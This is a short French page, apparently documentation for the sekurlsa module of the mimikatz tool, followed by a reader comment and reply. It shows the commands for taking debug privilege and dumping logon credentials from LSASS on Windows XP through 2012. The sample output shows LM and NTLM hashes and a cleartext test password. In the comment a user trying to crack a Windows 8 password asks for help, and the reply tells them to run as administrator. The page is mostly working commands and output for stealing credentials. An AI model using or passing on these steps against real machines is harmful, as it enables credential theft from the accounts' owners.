sekurlsa
un module local pour dumper les hashes et mots de passe depuis LSASS
Contrairement à son homologue librairie, cette version ne nécessite pas d’injection.
- Sous Windows XP et 2003
mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;199738 Package d'authentification : Kerberos Utilisateur principal : gentilkiwi Domaine d'authentification : TEST msv1_0 : * Utilisateur : gentilkiwi * Domaine : TEST * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a kerberos : * Utilisateur : gentilkiwi * Domaine : TEST.LOCAL * Mot de passe : waza1234/ wdigest : * Utilisateur : gentilkiwi * Domaine : TEST * Mot de passe : waza1234/ - Sous Windows Vista, 2008, 7, 2008r2, 8 et 2012
mimikatz # privilege::debug Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK mimikatz # sekurlsa::logonPasswords full Authentification Id : 0;370081 Package d'authentification : Kerberos Utilisateur principal : gentilkiwi Domaine d'authentification : NIRVANA msv1_0 : * Utilisateur : gentilkiwi * Domaine : TEST * Hash LM : d0e9aee149655a6075e4540af1f22d3b * Hash NTLM : cc36cf7a8514893efccd332446158b1a kerberos : * Utilisateur : gentilkiwi * Domaine : TEST.LOCAL * Mot de passe : waza1234/ wdigest : * Utilisateur : gentilkiwi * Domaine : TEST * Mot de passe : waza1234/ tspkg : * Utilisateur : gentilkiwi * Domaine : TEST * Mot de passe : waza1234/
Méthodes offertes :
Je parle anglais. J’ai traduit cela via Google Translate. Je suis en train de craquer mot de passe sur Windows 8. Il continue à me donner des erreurs de ne pas être en mesure d’injecter la dll. Ainsi que pour le débogage des privilèges. Qu’est-ce que je fais mal?
L’injection de DLL n’est pas requise pour dumper les mots de passe, en revanche, il faut toujours exécuter en tant qu’administrateur.